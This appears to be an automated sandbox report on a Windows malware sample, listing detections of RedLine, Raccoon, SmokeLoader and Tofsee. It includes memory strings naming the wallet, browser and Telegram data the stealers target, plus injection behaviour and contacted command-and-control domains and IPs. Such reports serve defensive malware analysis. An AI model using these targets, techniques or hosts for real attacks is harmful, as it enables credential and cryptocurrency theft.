                    Stealing of Sensitive Information:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
                    Yara detected SmokeLoaderShow sources
                    Source: Yara matchFile source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
                    Yara detected TofseeShow sources
                    Source: Yara matchFile source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: Electrum
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqliteUnknownExtension\Program Files (x86)\configArmorydisplayNamehost_keyNametdataSELECT * FROM \EWarningxodWarningusexpires_utc\Program Data\coMANGOokies.sqMANGOliteAFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct*ssfn*DisplayVersion%localappdata%\-*.lo--gLocalPrefs.jsonOpHandlerenVPHandlerN ConHandlernect%DSK_23%cmdOpera GXcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenterROOT\SecurityCenter2Web DataSteamPathwaasflleasft.datasfCommandLine\Telegram Desktop\tdataSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesTotalVisibleMemorySizeis_secureSoftware\Valve\SteamLogin DataID: isSecureegram.exeNoDefrdDefVPNDefwaasflletasf%useStringBuilderrproStringBuilderfile%\DStringBuilderocuStringBuildermeStringBuilderntsv11\Program Files\\ElBPOTE6AJIectruBPOTE6AJIm\wallBPOTE6AJIetsOpera GX StableSELECT * FROM Win32_Process Where SessionId='*.json\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnameProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueLocal Extension SettingsNWinordVWinpn.eWinxe*WinhostEWarningxodWarningusmoz_cookiesUser Datawindows-1251, CommandLine: \CCollectionoinCollectionomCollectioniDisplayName*.walletexpiry\EExceptionxodExceptionus\exodExceptionus.walExceptionletTel*.vstring.ReplacedfJaxxpath
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: svchost.exe, 0000000D.00000003.459986955.000001D408BC9000.00000004.00000001.sdmpString found in binary or memory: 2\r\n" \tResident Evil 2\r\n" \tMetro Exodus\r\n" \tForza Horizon 4\r\n" \tAnd more & \r\n \r\nMOVIES AND TV\r\nGo inside the story with immersive audio for your favorite shows and movies. Find Dolby Atmos content on:\r\n" \tNetflix"!\r\n" \tDisney+\r\n" \tMicrosoft Movies & TV\r\n" \tAmazon Prime Video\r\n" \tiQiyi\r\n" \tVUDU
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: Ethereum(Xq
                    Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmpString found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: 8433.exeString found in binary or memory: set_UseMachineKeyStore
                    Source: Yara matchFile source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR

                    Remote Access Functionality:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
                    Yara detected SmokeLoaderShow sources
                    Source: Yara matchFile source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
                    Yara detected TofseeShow sources
                    Source: Yara matchFile source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsNative API1Path InterceptionProcess Injection512Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information2LSASS MemorySystem Information Discovery124Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Logon Script (Windows)Software Packing13Security Account ManagerQuery Registry1SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSecurity Software Discovery841Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port11SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsVirtualization/Sandbox Evasion441VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol25Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion441DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection512Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491658 Sample: pAWNholT8X.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 51 194.180.174.100, 49843, 80 MIVOCLOUDMD unknown 2->51 53 t.me 149.154.167.99, 443, 49837 TELEGRAMRU United Kingdom 2->53 55 3 other IPs or domains 2->55 71 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->71 73 Antivirus detection for URL or domain 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 11 other signatures 2->77 10 pAWNholT8X.exe 2->10         started        13 ecrjwib 2->13         started        15 svchost.exe 1 2->15         started        17 3 other processes 2->17 signatures3 process4 signatures5 95 Detected unpacking (changes PE section rights) 10->95 19 pAWNholT8X.exe 10->19         started        97 Contains functionality to inject code into remote processes 13->97 99 Injects a PE file into a foreign processes 13->99 process6 signatures7 79 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 19->79 81 Maps a DLL or memory area into another process 19->81 83 Checks if the current machine is a virtual machine (disk enumeration) 19->83 85 Creates a thread in another existing process (thread injection) 19->85 22 explorer.exe 14 19->22 injected process8 dnsIp9 57 216.128.137.31, 80 AS-CHOOPAUS United States 22->57 59 privacy-toolz-for-you-403.top 194.147.85.186, 49767, 49768, 49771 NETRACK-ASRU Russian Federation 22->59 61 11 other IPs or domains 22->61 43 C:\Users\user\AppData\Roaming\ecrjwib, PE32 22->43 dropped 45 C:\Users\user\AppData\Local\Temp\FE25.exe, PE32 22->45 dropped 47 C:\Users\user\AppData\Local\Temp\CEB6.exe, PE32 22->47 dropped 49 5 other files (4 malicious) 22->49 dropped 87 System process connects to network (likely due to code injection or exploit) 22->87 89 Benign windows process drops PE files 22->89 91 Deletes itself after installation 22->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->93 27 6CB1.exe 22->27         started        30 8433.exe 3 22->30         started        32 757C.exe 2 22->32         started        file10 signatures11 process12 signatures13 101 Detected unpacking (changes PE section rights) 27->101 103 Injects a PE file into a foreign processes 27->103 34 6CB1.exe 27->34         started        105 Query firmware table information (likely to detect VMs) 30->105 107 Tries to detect sandboxes and other dynamic analysis tools (window names) 30->107 109 Hides threads from debuggers 30->109 111 Tries to detect sandboxes / dynamic malware analysis system (registry check) 30->111 37 conhost.exe 30->37         started        113 Antivirus detection for dropped file 32->113 115 Machine Learning detection for dropped file 32->115 39 757C.exe 2 32->39         started        41 conhost.exe 32->41         started        process14 signatures15 63 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 34->63 65 Maps a DLL or memory area into another process 34->65 67 Checks if the current machine is a virtual machine (disk enumeration) 34->67 69 Creates a thread in another existing process (thread injection) 34->69

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    pAWNholT8X.exe36%VirustotalBrowse
                    pAWNholT8X.exe40%ReversingLabsWin32.Trojan.Racealer

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\757C.exe100%AviraHEUR/AGEN.1106254
                    C:\Users\user\AppData\Local\Temp\CEB6.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\757C.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\FE25.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    4.1.pAWNholT8X.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.1.pAWNholT8X.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    20.1.6CB1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    22.2.757C.exe.490000.1.unpack100%AviraHEUR/AGEN.1106254Download File
                    17.2.757C.exe.800000.0.unpack100%AviraHEUR/AGEN.1106254Download File
                    20.2.6CB1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    15.1.ecrjwib.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    16.1.6CB1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    22.0.757C.exe.490000.0.unpack100%AviraHEUR/AGEN.1106254Download File
                    17.0.757C.exe.800000.0.unpack100%AviraHEUR/AGEN.1106254Download File
                    4.2.pAWNholT8X.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Endpoint/PartInstalledSoftwares0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartNordVPN0%Avira URL Cloudsafe
                    http://tempuri.org/2%VirustotalBrowse
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/ConfirmResponseP0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartDiscord0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP0%Avira URL Cloudsafe
                    http://geenaldencia9.top/100%Avira URL Cloudmalware
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartInstalledBrowsersResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartColdWalletsResponse0%Avira URL Cloudsafe
                    http://194.180.174.100/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://crl.ver)0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartProtonVPNResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartDiscordResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartFtpConnectionsResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartOpenVPN0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartOpenVPNResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponsensesResponseoon0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartProtonVPN0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartHardwaresResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/PartTelegramFilesResponse0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geenaldencia9.top
                    		194.147.85.186
                    		truefalse
                      		high
                      defeatwax.ru
                      		193.56.146.188
                      		truefalse
                        		high
                        t.me
                        		149.154.167.99
                        		truefalse
                          		high
                          privacy-toolz-for-you-403.top
                          		194.147.85.186
                          		truefalse
                            		high
                            nityanneron5.top
                            		unknown
                            		unknownfalse
                              		high
                              lynettaram7.top
                              		unknown
                              		unknownfalse
                                		high
                                umayaniela6.top
                                		unknown
                                		unknownfalse
                                  		high
                                  jebeccallis4.top
                                  		unknown
                                  		unknownfalse
                                    		high
                                    sadineyalas8.top
                                    		unknown
                                    		unknownfalse
                                      		high
                                      naghenrietti1.top
                                      		unknown
                                      		unknownfalse
                                        		high
                                        kimballiett2.top
                                        		unknown
                                        		unknownfalse
                                          		high
                                          api.ip.sb
                                          		unknown
                                          		unknownfalse
                                            		high
                                            xadriettany3.top
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://geenaldencia9.top/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://194.180.174.100/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/sc/sct8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/chrome_newtab8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Endpoint/PartInstalledSoftwares8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://corp.roblox.com/contact/svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/PartNordVPN8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://docs.oasis-open.org/ws-tx/wscoor/2006/068433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://tempuri.org/8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                    • 2%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha18433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Endpoint/ConfirmResponseP8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagePale757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Endpoint/PartDiscord8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://tempuri.org/Endpoint/SetEnvironment8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://tempuri.org/Endpoint/SetEnvironmentResponse8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_real8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/fault8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://tempuri.org/Endpoint/VerifyUpdate8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpfalse
                                                                                                            		high
